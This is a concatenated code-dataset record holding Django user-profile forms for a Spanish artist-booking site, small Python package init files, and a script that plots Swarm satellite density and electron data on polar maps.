] | null | null | null | directoalartista/apps/myaccount/forms.py | mpampols/directoalartista.com | 833eea7f4db5a2343dba4314793d593cd66cf1fb | [
"MIT"
] | 1 | 2018-03-29T02:16:18.000Z | 2018-03-29T02:16:18.000Z | # -*- coding: utf-8 -*-
from django.forms import ModelForm
from django.db import models
from django import forms
from django.contrib.admin.widgets import *
from localflavor.es.forms import ESProvinceSelect, ESIdentityCardNumberField, ESPostalCodeField, ESPhoneNumberField
from directoalartista.apps.genericuser.models import GenericUser
from django.contrib.auth import get_user_model
User = get_user_model()
class GenericUserEditProfileFormArtist(ModelForm):
user = models.ForeignKey(User, unique=True)
email = forms.CharField(max_length=75, widget=forms.TextInput(
attrs={
'class': 'form-control',
'required': 'true',
'type': 'email',
}),
label='Email'
)
phone = ESPhoneNumberField(max_length=15, widget=forms.TextInput(
attrs={
'class': 'form-control',
'required': 'true',
'type': 'tel',
}),
label='Teléfono'
)
first_name = forms.CharField(max_length=30, widget=forms.TextInput(
attrs={
'class': 'form-control',
'placeholder': 'El de verdad, no el artístico',
'required': 'true'
}),
label='Nombre'
)
last_name = forms.CharField(max_length=60, widget=forms.TextInput(
attrs={
'class': 'form-control',
'required': 'true'
}),
label='Apellidos'
)
dni = forms.CharField(max_length=10, widget=forms.TextInput(
attrs={
'class': 'form-control',
'required': 'true'
}),
label='DNI'
)
address = forms.CharField(max_length=255, required=False, widget=forms.TextInput(
attrs={
'class': 'form-control'
}),
label='Dirección'
)
postal_code = ESPostalCodeField(max_length=10, required=False, widget=forms.TextInput(
attrs={
'class': 'form-control',
}),
label='Código postal'
)
city = forms.CharField(max_length=80, required=False, widget=forms.TextInput(
attrs={
'class': 'form-control',
}),
label='Ciudad'
)
province = forms.CharField(max_length=80, widget=ESProvinceSelect(
attrs={
'class': 'form-control',
}),
label='Provincia'
)
actual_password = forms.CharField(max_length=60, required=False, widget=forms.TextInput(
attrs={
'class': 'form-control',
'type': 'password',
}),
label='Contraseña'
)
new_password = forms.CharField(max_length=60, required=False, widget=forms.TextInput(
attrs={
'class': 'form-control',
'type': 'password',
}),
label='Nueva contraseña'
)
new_password_repeat = forms.CharField(max_length=60, required=False, widget=forms.TextInput(
attrs={
'class': 'form-control',
'type': 'password',
}),
label='Repite la nueva contraseña'
)
newsletter_subscription = forms.BooleanField(required=False)
class Meta:
model = GenericUser
fields = {"email", "phone", "first_name", "last_name", "dni", "address", "postal_code", "city", "province",
"actual_password", "new_password", "new_password_repeat", "newsletter_subscription"}
def __unicode__(self):
return unicode(self.user)
class GenericUserEditProfileFormAgency(ModelForm):
user = models.ForeignKey(User, unique=True)
email = forms.CharField(max_length=75, widget=forms.TextInput(
attrs={
'class': 'form-control',
'required': 'true',
'type': 'email',
}),
label='Email'
)
phone = ESPhoneNumberField(max_length=15, widget=forms.TextInput(
attrs={
'class': 'form-control',
'required': 'true',
'type': 'tel',
}),
label='Teléfono'
)
first_name = forms.CharField(max_length=30, widget=forms.TextInput(
attrs={
'class': 'form-control',
'required': 'true'
}),
label='Nombre'
)
last_name = forms.CharField(max_length=60, widget=forms.TextInput(
attrs={
'class': 'form-control',
'required': 'true'
}),
label='Apellidos'
)
dni = forms.CharField(max_length=10, widget=forms.TextInput(
attrs={
'class': 'form-control',
'required': 'true'
}),
label='DNI'
)
address = forms.CharField(max_length=255, required=False, widget=forms.TextInput(
attrs={
'class': 'form-control'
}),
label='Dirección'
)
postal_code = ESPostalCodeField(max_length=10, required=False, widget=forms.TextInput(
attrs={
'class': 'form-control',
}),
label='Código postal'
)
city = forms.CharField(max_length=80, required=False, widget=forms.TextInput(
attrs={
'class': 'form-control',
}),
label='Ciudad'
)
province = forms.CharField(max_length=80, widget=ESProvinceSelect(
attrs={
'class': 'form-control',
}),
label='Provincia'
)
agency_name = forms.CharField(max_length=255, required=True, widget=forms.TextInput(
attrs={
'class': 'form-control',
'required': 'true',
}),
label='Nombre de la agencia'
)
agency_company_name = forms.CharField(max_length=255, required=True, widget=forms.TextInput(
attrs={
'class': 'form-control',
'required': 'true',
}),
label='Razón social'
)
agency_cif = forms.CharField(max_length=15, required=True, widget=forms.TextInput(
attrs={
'class': 'form-control',
'required': 'true',
}),
label='CIF'
)
agency_additional_info = forms.CharField(max_length=1000, required=False, widget=forms.Textarea(
attrs={
'class': 'form-control',
'required': 'false'
}),
label='Información adicional'
)
actual_password = forms.CharField(max_length=60, required=False, widget=forms.TextInput(
attrs={
'class': 'form-control',
'type': 'password',
}),
label='Contraseña'
)
new_password = forms.CharField(max_length=60, required=False, widget=forms.TextInput(
attrs={
'class': 'form-control',
'type': 'password',
}),
label='Nueva contraseña'
)
new_password_repeat = forms.CharField(max_length=60, required=False, widget=forms.TextInput(
attrs={
'class': 'form-control',
'type': 'password',
}),
label='Repite la nueva contraseña'
)
newsletter_subscription = forms.BooleanField(required=False)
class Meta:
model = GenericUser
fields = {"email", "phone", "first_name", "last_name", "dni", "address", "postal_code", "city", "province",
"agency_additional_info", "agency_cif", "agency_company_name", "agency_name", "actual_password",
"new_password", "new_password_repeat", "newsletter_subscription"}
def __unicode__(self):
return unicode(self.user)
class GenericUserEditProfileFormPromoter(ModelForm):
user = models.ForeignKey(User, unique=True)
email = forms.CharField(max_length=75, widget=forms.TextInput(
attrs={
'class': 'form-control',
'required': 'true',
'type': 'email',
}),
label='Email'
)
phone = ESPhoneNumberField(max_length=15, widget=forms.TextInput(
attrs={
'class': 'form-control',
'required': 'true',
'type': 'tel',
}),
label='Teléfono'
)
first_name = forms.CharField(max_length=30, widget=forms.TextInput(
attrs={
'class': 'form-control',
'required': 'true'
}),
label='Nombre'
)
last_name = forms.CharField(max_length=60, widget=forms.TextInput(
attrs={
'class': 'form-control',
'required': 'true'
}),
label='Apellidos'
)
dni = forms.CharField(max_length=10, widget=forms.TextInput(
attrs={
'class': 'form-control',
'required': 'true'
}),
label='DNI'
)
address = forms.CharField(max_length=255, required=False, widget=forms.TextInput(
attrs={
'class': 'form-control'
}),
label='Dirección'
)
postal_code = ESPostalCodeField(max_length=10, required=False, widget=forms.TextInput(
attrs={
'class': 'form-control',
}),
label='Código postal'
)
city = forms.CharField(max_length=80, required=False, widget=forms.TextInput(
attrs={
'class': 'form-control',
}),
label='Ciudad'
)
province = forms.CharField(max_length=80, widget=ESProvinceSelect(
attrs={
'class': 'form-control',
}),
label='Provincia'
)
promoter_room_or_event_name = forms.CharField(max_length=255, widget=forms.TextInput(
attrs={
'class': 'form-control',
'required': 'true'
}),
label='Nombre de la sala o evento*'
)
promoter_company_name = forms.CharField(max_length=255, required=False, widget=forms.TextInput(
attrs={
'class': 'form-control',
}),
label='Razón social'
)
promoter_cif = forms.CharField(max_length=15, required=False, widget=forms.TextInput(
attrs={
'class': 'form-control',
}),
label='CIF'
)
promoter_additional_info = forms.CharField(max_length=1000, required=False, widget=forms.Textarea(
attrs={
'class': 'form-control',
}),
label='Provincia'
)
actual_password = forms.CharField(max_length=60, required=False, widget=forms.TextInput(
attrs={
'class': 'form-control',
'type': 'password',
}),
label='Contraseña'
)
new_password = forms.CharField(max_length=60, required=False, widget=forms.TextInput(
attrs={
'class': 'form-control',
'type': 'password',
}),
label='Nueva contraseña'
)
new_password_repeat = forms.CharField(max_length=60, required=False, widget=forms.TextInput(
attrs={
'class': 'form-control',
'type': 'password',
}),
label='Repite la nueva contraseña'
)
newsletter_subscription = forms.BooleanField(required=False)
class Meta:
model = GenericUser
fields = {"email", "phone", "first_name", "last_name", "dni", "address", "postal_code", "city", "province",
"promoter_room_or_event_name", "promoter_company_name", "promoter_cif", "promoter_additional_info",
"actual_password", "new_password", "new_password_repeat", "newsletter_subscription"}
def __unicode__(self):
return unicode(self.user)
| 30.723192 | 117 | 0.516071 | 1,058 | 12,320 | 5.879017 | 0.106805 | 0.063666 | 0.099035 | 0.148553 | 0.886495 | 0.878457 | 0.873633 | 0.86463 | 0.861736 | 0.861736 | 0 | 0.012658 | 0.358766 | 12,320 | 400 | 118 | 30.8 | 0.774684 | 0.001705 | 0 | 0.789318 | 0 | 0 | 0.178174 | 0.013255 | 0 | 0 | 0 | 0 | 0 | 1 | 0.008902 | false | 0.065282 | 0.020772 | 0.008902 | 0.204748 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 8 |
fda12589643014bae8ffbc22525fe1b15f309d40 | 118 | py | Python | ou_Axion_limit/__init__.py | OuYangMinOa/ou_Axion_limit | 7f68dd906579b3cd255fa3098f9b1d6d44e412b3 | [
"MIT"
] | 1 | 2021-09-29T20:01:41.000Z | 2021-09-29T20:01:41.000Z | ou_Axion_limit/__init__.py | OuYangMinOa/ou_Axion_limit | 7f68dd906579b3cd255fa3098f9b1d6d44e412b3 | [
"MIT"
] | null | null | null | ou_Axion_limit/__init__.py | OuYangMinOa/ou_Axion_limit | 7f68dd906579b3cd255fa3098f9b1d6d44e412b3 | [
"MIT"
] | null | null | null | from ou_Axion_limit.Glimit import Glimit
from ou_Axion_limit.Analy import analyse
if __name__ == "__main__":
pass
| 16.857143 | 41 | 0.79661 | 18 | 118 | 4.555556 | 0.666667 | 0.146341 | 0.268293 | 0.390244 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.144068 | 118 | 6 | 42 | 19.666667 | 0.811881 | 0 | 0 | 0 | 0 | 0 | 0.067797 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.25 | 0.5 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 7 |
fdb6e1ad7ec60624db0ae18c5509acf5fa8bd887 | 141 | py | Python | bot/text_src/__init__.py | JakubKoralewski/idiotduo-biblia-twitter | 6aa65378f0964fee7d0cc305e755962acdee9b37 | [
"MIT"
] | 2 | 2019-05-12T18:48:38.000Z | 2019-09-25T22:21:09.000Z | bot/text_src/__init__.py | JakubKoralewski/idiotduo-biblia-twitter | 6aa65378f0964fee7d0cc305e755962acdee9b37 | [
"MIT"
] | 7 | 2019-04-05T14:20:46.000Z | 2022-03-11T23:32:14.000Z | bot/text_src/__init__.py | JakubKoralewski/idiotduo-biblia-twitter | 6aa65378f0964fee7d0cc305e755962acdee9b37 | [
"MIT"
] | 3 | 2019-05-12T18:51:26.000Z | 2020-08-25T22:11:08.000Z | from .bible.zdobadz_cytat import zdobadz_cytat
from .lexical.slowo_na_dzis import slowo_na_dzis
from .rnm.get_rnm_quote import get_rnm_quote
| 35.25 | 48 | 0.87234 | 25 | 141 | 4.52 | 0.48 | 0.212389 | 0.19469 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.085106 | 141 | 3 | 49 | 47 | 0.875969 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
fdd13fbba46b87a629b5978ff051acac390c6e15 | 15,568 | py | Python | test/test_swarm.py | JouleCai/GeoSpaceLab | 6cc498d3c32501e946931de596a840c73e83edb3 | [
"BSD-3-Clause"
] | 19 | 2021-08-07T08:49:22.000Z | 2022-03-02T18:26:30.000Z | test/test_swarm.py | JouleCai/GeoSpaceLab | 6cc498d3c32501e946931de596a840c73e83edb3 | [
"BSD-3-Clause"
] | 4 | 2021-11-09T05:53:42.000Z | 2022-03-25T11:49:37.000Z | test/test_swarm.py | JouleCai/GeoSpaceLab | 6cc498d3c32501e946931de596a840c73e83edb3 | [
"BSD-3-Clause"
] | 3 | 2021-11-07T11:41:20.000Z | 2022-02-14T13:43:11.000Z | import cartopy.crs as ccrs
import matplotlib.pyplot as plt
import matplotlib.colors as colors
from loaders.load_uta_gitm_201602_newrun import *
import utilities.datetime_utilities as du
import visualization.time_series as ts
from geospacelab.visualization.mpl.geomap.geopanels import PolarMapPanel as PolarMap
import geospacelab.visualization.mpl.colormaps as cm
def get_swarm_data(dt_fr, dt_to, satID="C"):
dt_range = [dt_fr, dt_to]
instr_info1 = {'name': 'SWARM-' + satID, 'assign_key': 'SWARM_ACC'}
database = 'uta'
paralist = [
{'database': database, 'instrument': instr_info1, 'paraname': 'N_n_SC'},
{'database': database, 'instrument': instr_info1, 'paraname': 'N_n_s450'},
{'database': database, 'instrument': instr_info1, 'paraname': 'N_n_s500'},
]
paras_layout = [[1, 2]]
tsObj = ts.TimeSeries(dt_range=dt_range, paralist=paralist, paras_layout=paras_layout, timeline='multiple')
sc_lat = tsObj.dataObjs['uta_swarm_c_acc'].paras['SC_GEO_LAT']
sc_lon = tsObj.dataObjs['uta_swarm_c_acc'].paras['SC_GEO_LON']
sc_lst = tsObj.dataObjs['uta_swarm_c_acc'].paras['SC_GEO_ST']
sc_datetime = tsObj.dataObjs['uta_swarm_c_acc'].paras['SC_DATETIME']
rho_n_sc = tsObj.dataObjs['uta_swarm_c_acc'].paras['N_n_SC']
swarm_data = {
'sc_lat': sc_lat,
'sc_lon': sc_lon,
'sc_lst': sc_lst,
'sc_datetime': sc_datetime,
'rho_n_sc': rho_n_sc
}
return swarm_data
def show_rho_n(dt_fr, dt_to):
swarm_data = get_swarm_data(dt_fr, dt_to)
sc_lon = swarm_data['sc_lon'].flatten()
sc_lat = swarm_data['sc_lat'].flatten()
sc_dt = swarm_data['sc_datetime'].flatten()
rho_n_sc = swarm_data['rho_n_sc'].flatten()
plt.figure(figsize=(8,8))
# cs = 'GEO'
# panel = PolarView(cs='GEO', sytle='lst-fixed', pole='N', lon_c=None, lst_c=0, mlt_c=None, ut=dt_fr, boundary_lat=30., proj_style='Stereographic')
cs = 'AACGM'
panel = PolarMap(cs=cs, style='mlt-fixed', pole='N', lon_c=None, lst_c=None, mlt_c=0, ut=dt_fr, boundary_lat=30., proj_style='Stereographic')
panel.add_subplot(major=True)
panel.set_extent(boundary_style='circle')
data = panel.projection.transform_points(ccrs.PlateCarree(), sc_lon, sc_lat)
x = data[:, 0]
y = data[:, 1]
from scipy.stats import linregress
coef = linregress(x, y)
a = coef.slope
b = coef.intercept
# x1 = np.linspace(np.nanmin(x), np.nanmax(x), num=500)
# y1 = np.linspace(np.nanmin(y), np.nanmax(y), num=500)
# x2d, y2d = np.meshgrid(x, y)
# z2d = griddata(data[:, 0:2], rho_n_sc.flatten(), (x2d, y2d), method='nearest')
# z2d_dist = np.abs(a*x2d - y2d + b) / np.sqrt(a**2 + 1)
# z2d = np.where(z2d_dist>1000, np.nan, z2d)
#
# im = panel.major_ax.pcolormesh(x2d, y2d, z2d, vmin=2e-14, vmax=20e-13, cmap='gist_ncar')
# panel.major_ax.plot(sc_lon, sc_lat, transform=ccrs.Geodetic(), linewidth=0.5, color='k')
# plt.colorbar(im)
# xx = np.tile(x, [3, 1])
#
# yy = np.concatenate((y[np.newaxis, :]-150000, y[np.newaxis, :], y[np.newaxis, :]+150000), axis=0)
# zz = np.concatenate((rho_n_sc.T, rho_n_sc.T, rho_n_sc.T), axis=0)
#
# zz = griddata(data[:, 0:2], rho_n_sc.flatten(), (xx, yy), method='nearest')
# im = panel.major_ax.pcolormesh(xx, yy, zz, vmin=2e-14, vmax=20e-13, cmap='gist_ncar')
#
# # panel.major_ax.plot(sc_lon, sc_lat, transform=ccrs.Geodetic(), linewidth=0.5, color='k')
# plt.colorbar(im)
#panel.major_ax.plot(data[:,0], data[:,1], linewidth=3)
from matplotlib.collections import LineCollection
coords = {'lat': sc_lat, 'lon': sc_lon, 'height': 250.}
cs_new = panel.cs_transform(cs_fr='GEO', cs_to=cs, coords=coords)
data = panel.projection.transform_points(ccrs.PlateCarree(), cs_new['lon'], cs_new['lat'])
x = data[:, 0]
y = data[:, 1]
z = rho_n_sc.flatten()
points = np.array([x, y]).T.reshape(-1, 1, 2)
segments = np.concatenate([points[:-1], points[1:]], axis=1)
norm = plt.Normalize(2e-14, 18e-13)
lc = LineCollection(segments, cmap='gist_ncar', norm=norm)
lc.set_array(z)
lc.set_linewidth(6)
line = panel.major_ax.add_collection(lc)
cbar = plt.gcf().colorbar(line, ax=panel.major_ax, pad=0.1, fraction=0.03)
cbar.set_label('Neutral mass density\n' + r'(kg/m$^{3}$)', rotation=270, labelpad=25)
#cbaxes = plt.gcf().add_axes([0.8, 0.1, 0.03, 0.8])
#cb = plt.colorbar(panel.major_ax, cax = cbaxes)
sectime, dt0 = du.convert_datetime_to_sectime(sc_dt, datetime.datetime(dt_fr.year, dt_fr.month, dt_fr.day))
sectime_res = 10 * 60
time_ticks = np.arange(np.floor(sectime[0]/sectime_res)*sectime_res, np.ceil(sectime[-1]/sectime_res)*sectime_res, sectime_res)
from scipy.interpolate import interp1d
f = interp1d(sectime, x, fill_value='extrapolate')
x_time_ticks = f(time_ticks)
f = interp1d(sectime, y, fill_value='extrapolate')
y_time_ticks = f(time_ticks)
panel.major_ax.plot(x_time_ticks, y_time_ticks, '.', markersize=4, color='k')
for ind, time_tick in enumerate(time_ticks):
time = dt0 + datetime.timedelta(seconds=time_tick)
x_time_tick = x_time_ticks[ind]
y_time_tick = y_time_ticks[ind]
if x_time_tick < panel._extent[0] or x_time_tick > panel._extent[1]:
continue
if y_time_tick < panel._extent[2] or y_time_tick > panel._extent[3]:
continue
panel.major_ax.text( x_time_tick, y_time_tick, time.strftime("%d %H:%M"), fontsize=6)
panel.add_coastlines()
panel.add_grids()
plt.gcf().suptitle('Swarm-C neutral mass density\n 2016-02-03T07:00 - 2016-02-03T07:50')
plt.savefig('test_pho_n_aacgm.png', dpi=300)
# plt.show()
def show_n_e(dt_fr, dt_to):
import cdflib
filepath = "~/tmp/SW_OPER_EFIC_LP_1B_20160203T000000_20160203T235959_0501_MDR_EFI_LP.cdf"
cf = cdflib.CDF(filepath)
cf_info = cf.cdf_info()
n_e = cf.varget(variable='Ne')
T_e = cf.varget(variable='Te')
sc_lat = cf.varget(variable='Latitude')
sc_lon = cf.varget(variable='Longitude')
timestamp = cf.varget(variable='Timestamp')
dtstrs = cdflib.cdfepoch.encode(timestamp)
dts = np.empty_like(timestamp, dtype=datetime.datetime)
for ind, dtstr in enumerate(dtstrs):
dts[ind] = datetime.datetime.strptime(dtstr+'000', '%Y-%m-%dT%H:%M:%S.%f')
ind_dt = np.where((dts >= dt_fr) & (dts <= dt_to))[0]
# times = cdflib.cdfepoch.unixtime(timestamp, to_np=True)
sc_lon = sc_lon[ind_dt]
sc_lat = sc_lat[ind_dt]
sc_dt = dts[ind_dt]
rho_n_sc = n_e[ind_dt]
plt.figure(figsize=(8,8))
cs = 'GEO'
panel = PolarMap(
cs='GEO', style='lst-fixed', pole='N', lon_c=None, lst_c=0, mlt_c=None, ut=dt_fr,
boundary_lat=0., proj_type='Stereographic')
# cs = 'AACGM'
#panel = PolarMap(cs=cs, style='mlt-fixed', pole='N', lon_c=None, lst_c=None, mlt_c=0, ut=dt_fr, boundary_lat=30.,
# proj_type='Stereographic')
panel.set_extent(boundary_style='circle')
data = panel.projection.transform_points(ccrs.PlateCarree(), sc_lon, sc_lat)
x = data[:, 0]
y = data[:, 1]
from scipy.stats import linregress
coef = linregress(x, y)
a = coef.slope
b = coef.intercept
# x1 = np.linspace(np.nanmin(x), np.nanmax(x), num=500)
# y1 = np.linspace(np.nanmin(y), np.nanmax(y), num=500)
# x2d, y2d = np.meshgrid(x, y)
# z2d = griddata(data[:, 0:2], rho_n_sc.flatten(), (x2d, y2d), method='nearest')
# z2d_dist = np.abs(a*x2d - y2d + b) / np.sqrt(a**2 + 1)
# z2d = np.where(z2d_dist>1000, np.nan, z2d)
#
# im = panel.major_ax.pcolormesh(x2d, y2d, z2d, vmin=2e-14, vmax=20e-13, cmap='gist_ncar')
# panel.major_ax.plot(sc_lon, sc_lat, transform=ccrs.Geodetic(), linewidth=0.5, color='k')
# plt.colorbar(im)
# xx = np.tile(x, [3, 1])
#
# yy = np.concatenate((y[np.newaxis, :]-150000, y[np.newaxis, :], y[np.newaxis, :]+150000), axis=0)
# zz = np.concatenate((rho_n_sc.T, rho_n_sc.T, rho_n_sc.T), axis=0)
#
# zz = griddata(data[:, 0:2], rho_n_sc.flatten(), (xx, yy), method='nearest')
# im = panel.major_ax.pcolormesh(xx, yy, zz, vmin=2e-14, vmax=20e-13, cmap='gist_ncar')
#
# # panel.major_ax.plot(sc_lon, sc_lat, transform=ccrs.Geodetic(), linewidth=0.5, color='k')
# plt.colorbar(im)
#panel.major_ax.plot(data[:,0], data[:,1], linewidth=3)
from matplotlib.collections import LineCollection
coords = {'lat': sc_lat, 'lon': sc_lon, 'height': 250.}
cs_new = panel.cs_transform(cs_fr='GEO', cs_to=cs, coords=coords)
data = panel.projection.transform_points(ccrs.PlateCarree(), cs_new['lon'], cs_new['lat'])
x = data[:, 0]
y = data[:, 1]
z = rho_n_sc.flatten()
points = np.array([x, y]).T.reshape(-1, 1, 2)
segments = np.concatenate([points[:-1], points[1:]], axis=1)
norm = colors.LogNorm(vmin=8e3, vmax=1e6)
lc = LineCollection(segments, cmap=cm.cmap_gist_ncar_modified(), norm=norm)
lc.set_array(z)
lc.set_linewidth(6)
line = panel.major_ax.add_collection(lc)
cbar = plt.gcf().colorbar(line, ax=panel.major_ax, pad=0.1, fraction=0.03)
cbar.set_label(r'$n_e$' + '\n' + r'(cm$^{-3}$)', rotation=270, labelpad=25)
#cbaxes = plt.gcf().add_axes([0.8, 0.1, 0.03, 0.8])
#cb = plt.colorbar(panel.major_ax, cax = cbaxes)
sectime, dt0 = du.convert_datetime_to_sectime(sc_dt, datetime.datetime(dt_fr.year, dt_fr.month, dt_fr.day))
sectime_res = 10 * 60
time_ticks = np.arange(np.floor(sectime[0]/sectime_res)*sectime_res, np.ceil(sectime[-1]/sectime_res)*sectime_res, sectime_res)
from scipy.interpolate import interp1d
f = interp1d(sectime, x, fill_value='extrapolate')
x_time_ticks = f(time_ticks)
f = interp1d(sectime, y, fill_value='extrapolate')
y_time_ticks = f(time_ticks)
panel.major_ax.plot(x_time_ticks, y_time_ticks, '.', markersize=4, color='k')
for ind, time_tick in enumerate(time_ticks):
time = dt0 + datetime.timedelta(seconds=time_tick)
x_time_tick = x_time_ticks[ind]
y_time_tick = y_time_ticks[ind]
if x_time_tick < panel._extent[0] or x_time_tick > panel._extent[1]:
continue
if y_time_tick < panel._extent[2] or y_time_tick > panel._extent[3]:
continue
panel.major_ax.text( x_time_tick, y_time_tick, time.strftime("%d %H:%M"), fontsize=6)
panel.add_coastlines()
panel.add_gridlines()
plt.gcf().suptitle('Swarm-C electron density\n' + dt_fr.strftime("%Y%m%dT%H%M") + ' - ' + dt_to.strftime("%Y%m%dT%H%M"))
plt.savefig('swarm_ne_' + cs + '_' + dt_fr.strftime("%Y%m%d_%H%M") + '-' + dt_to.strftime('%H%M'), dpi=300)
plt.show()
def show_T_e(dt_fr, dt_to):
import cdflib
filepath = "~/tmp/SW_OPER_EFIC_LP_1B_20160203T000000_20160203T235959_0501_MDR_EFI_LP.cdf"
cf = cdflib.CDF(filepath)
cf_info = cf.cdf_info()
n_e = cf.varget(variable='Ne')
T_e = cf.varget(variable='Te')
sc_lat = cf.varget(variable='Latitude')
sc_lon = cf.varget(variable='Longitude')
timestamp = cf.varget(variable='Timestamp')
dtstrs = cdflib.cdfepoch.encode(timestamp)
dts = np.empty_like(timestamp, dtype=datetime.datetime)
for ind, dtstr in enumerate(dtstrs):
dts[ind] = datetime.datetime.strptime(dtstr+'000', '%Y-%m-%dT%H:%M:%S.%f')
ind_dt = np.where((dts >= dt_fr) & (dts <= dt_to))[0]
# times = cdflib.cdfepoch.unixtime(timestamp, to_np=True)
sc_lon = sc_lon[ind_dt]
sc_lat = sc_lat[ind_dt]
sc_dt = dts[ind_dt]
rho_n_sc = T_e[ind_dt]
plt.figure(figsize=(8,8))
panel = PolarView(cs='GEO', pole='N', lon_c=None, lst_c=0, ut=dt_fr, boundary_lat=0., proj_style='Stereographic')
panel.add_subplot(major=True)
panel.set_extent(boundary_style='circle')
data = panel.projection.transform_points(ccrs.PlateCarree(), sc_lon, sc_lat)
x = data[:, 0]
y = data[:, 1]
from scipy.stats import linregress
coef = linregress(x, y)
a = coef.slope
b = coef.intercept
# x1 = np.linspace(np.nanmin(x), np.nanmax(x), num=500)
# y1 = np.linspace(np.nanmin(y), np.nanmax(y), num=500)
# x2d, y2d = np.meshgrid(x, y)
# z2d = griddata(data[:, 0:2], rho_n_sc.flatten(), (x2d, y2d), method='nearest')
# z2d_dist = np.abs(a*x2d - y2d + b) / np.sqrt(a**2 + 1)
# z2d = np.where(z2d_dist>1000, np.nan, z2d)
#
# im = panel.major_ax.pcolormesh(x2d, y2d, z2d, vmin=2e-14, vmax=20e-13, cmap='gist_ncar')
# panel.major_ax.plot(sc_lon, sc_lat, transform=ccrs.Geodetic(), linewidth=0.5, color='k')
# plt.colorbar(im)
# xx = np.tile(x, [3, 1])
#
# yy = np.concatenate((y[np.newaxis, :]-150000, y[np.newaxis, :], y[np.newaxis, :]+150000), axis=0)
# zz = np.concatenate((rho_n_sc.T, rho_n_sc.T, rho_n_sc.T), axis=0)
#
# zz = griddata(data[:, 0:2], rho_n_sc.flatten(), (xx, yy), method='nearest')
# im = panel.major_ax.pcolormesh(xx, yy, zz, vmin=2e-14, vmax=20e-13, cmap='gist_ncar')
#
# # panel.major_ax.plot(sc_lon, sc_lat, transform=ccrs.Geodetic(), linewidth=0.5, color='k')
# plt.colorbar(im)
#panel.major_ax.plot(data[:,0], data[:,1], linewidth=3)
from matplotlib.collections import LineCollection
data = panel.projection.transform_points(ccrs.PlateCarree(), sc_lon, sc_lat)
x = data[:, 0]
y = data[:, 1]
z = rho_n_sc.flatten()
points = np.array([x, y]).T.reshape(-1, 1, 2)
segments = np.concatenate([points[:-1], points[1:]], axis=1)
norm = plt.Normalize(500, 4000)
# norm = colors.LogNorm(vmin=5e2, vmax=1e6)
lc = LineCollection(segments, cmap='gist_ncar', norm=norm)
lc.set_array(z)
lc.set_linewidth(6)
line = panel.major_ax.add_collection(lc)
cbar = plt.gcf().colorbar(line, ax=panel.major_ax, pad=0.1, fraction=0.03)
cbar.set_label(r'$T_e$' + '\n' + r'(K)', rotation=270, labelpad=25)
#cbaxes = plt.gcf().add_axes([0.8, 0.1, 0.03, 0.8])
#cb = plt.colorbar(panel.major_ax, cax = cbaxes)
sectime, dt0 = du.convert_datetime_to_sectime(sc_dt, datetime.datetime(dt_fr.year, dt_fr.month, dt_fr.day))
sectime_res = 10 * 60
time_ticks = np.arange(np.floor(sectime[0]/sectime_res)*sectime_res, np.ceil(sectime[-1]/sectime_res)*sectime_res, sectime_res)
from scipy.interpolate import interp1d
f = interp1d(sectime, x, fill_value='extrapolate')
x_time_ticks = f(time_ticks)
f = interp1d(sectime, y, fill_value='extrapolate')
y_time_ticks = f(time_ticks)
panel.major_ax.plot(x_time_ticks, y_time_ticks, '.', markersize=4, color='k')
for ind, time_tick in enumerate(time_ticks):
time = dt0 + datetime.timedelta(seconds=time_tick)
x_time_tick = x_time_ticks[ind]
y_time_tick = y_time_ticks[ind]
if x_time_tick < panel._extent[0] or x_time_tick > panel._extent[1]:
continue
if y_time_tick < panel._extent[2] or y_time_tick > panel._extent[3]:
continue
panel.major_ax.text( x_time_tick, y_time_tick, time.strftime("%d %H:%M"), fontsize=6)
panel.add_coastlines()
panel.add_grids()
plt.gcf().suptitle('Swarm-C electron temperature\n 2016-02-03T07:00 - 2016-02-03T07:50')
plt.savefig('test_T_e.png', dpi=300)
plt.show()
if __name__ == "__main__":
dt_fr = datetime.datetime(2016, 2, 3, 0, 40)
dt_to = datetime.datetime(2016, 2, 3, 1, 40)
# show_rho_n(dt_fr, dt_to)
show_n_e(dt_fr, dt_to)
# show_T_e(dt_fr, dt_to) | 40.541667 | 151 | 0.649152 | 2,498 | 15,568 | 3.82546 | 0.119696 | 0.031394 | 0.037673 | 0.020092 | 0.892424 | 0.878924 | 0.864483 | 0.847426 | 0.818753 | 0.806614 | 0 | 0.044354 | 0.183196 | 15,568 | 384 | 152 | 40.541667 | 0.707141 | 0.250771 | 0 | 0.708696 | 0 | 0.008696 | 0.099042 | 0.013125 | 0 | 0 | 0 | 0 | 0 | 1 | 0.017391 | false | 0 | 0.082609 | 0 | 0.104348 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
fddda20cbaf80350828fa414f762768a4f2b2d51 | 16,037 | py | Python | tests/test_controllers.py | mark-koren/flow | f3f6d7e9c64f6b641a464a716c7f38ca00388805 | [
"MIT"
] | null | null | null | tests/test_controllers.py | mark-koren/flow | f3f6d7e9c64f6b641a464a716c7f38ca00388805 | [
"MIT"
] | null | null | null | tests/test_controllers.py | mark-koren/flow | f3f6d7e9c64f6b641a464a716c7f38ca00388805 | [
